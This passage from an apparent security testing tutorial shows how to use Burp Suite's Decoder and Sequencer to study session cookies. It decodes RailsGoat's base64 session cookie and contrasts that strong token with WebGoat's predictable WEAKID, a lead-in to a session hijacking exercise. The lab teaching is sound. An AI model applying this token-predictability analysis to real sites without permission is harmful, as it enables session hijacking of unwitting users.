We will start analyzing RailsGoat's session cookie. We could have used any PHPSESSID or JSESSIONID cookie, but we will take advantage of this one being a custom value to review additional concepts. Configure your browser to use Burp Suite as a proxy and follow the next steps:

1. Log in to RailsGoat and look at the proxy's history for a response setting a session cookie. You should have the header Set-Cookie and should set a cookie called _railsgoat_session.

2. In this case, this is a request to /railsgoat/session. Right-click on the URL, or on the body of the request or response, and select Send to Sequencer:

3. Before continuing with Sequencer, let's see what the session cookie contains. This _railsgoat_session cookie looks like a base64-encoded string joined to a hexadecimal string by two hyphens (--). We'll explain this deduction later in this recipe. Select the value of the cookie, right-click on it, and select Send to Decoder.

4. Once in decoder, we first decode it as a URL, and then, in the second line, we decode it as base64:

It seems as if the base64 code contains three fields: session_id, which is a hexadecimal value, perhaps a hash; csrf_token, which is a value used to prevent Cross-Site Request Forgery (CSRF) attacks; and user_id, which seems to be just two characters, maybe a sequential number. The rest of the cookie (the part after the --) is not base64-encoded and appears to be a random hash. Now, we understand a little bit more about the session ID, and have learned a little bit about encoding and Burp Suite's Decoder.

5. Let's continue with our analysis in Sequencer. Go to the Sequencer tab in Burp Suite and ensure that the correct request and cookie are selected:

6. We know the cookie is encoded with base64; go to Analysis Options and select Base64-decode before analyzing. This way, Burp Suite will analyze the decoded information in the cookie.
7. Go back to the Live capture tab and click on Start live capture. A new window will appear; we wait for it to finish. It'll take some time.

8. Once it is finished, click on Analyze now:

We can see that the cookie is of excellent quality; this means it is not easily guessable by an attacker. Feel free to explore all the result tabs.

9. That was an example of a good quality session cookie; let's see a not-so-good one this time. Log in to WebGoat and go to Session Management Flaws | Hijack a Session.

10. This exercise is about bypassing a login form by hijacking a valid session ID. Attempt a login with any random username and password, just to get it recorded in Burp Suite:

11. In this case, the request that sets the session cookie is the one that first loads the exercise; search in Burp Suite's history for the Set-Cookie: WEAKID= response header. This ID is merely numbers separated by a hyphen.
12. Send the request to Sequencer.
13. Select the WEAKID cookie as the target to analyze.

14. Start the live capture and wait for it to finish and execute the analysis:

For this ID, we can see that the quality is extremely poor. Going to the character analysis, we can have a better idea:

This chart shows the degree of change or significance for each character position. We see that significance increases from position 2 to position 3 and from 3 to 4, to then fall again in 5, which is the location of the hyphen. This suggests that the first part of the ID is incremental and that the same may apply to the second part, but with a different rate.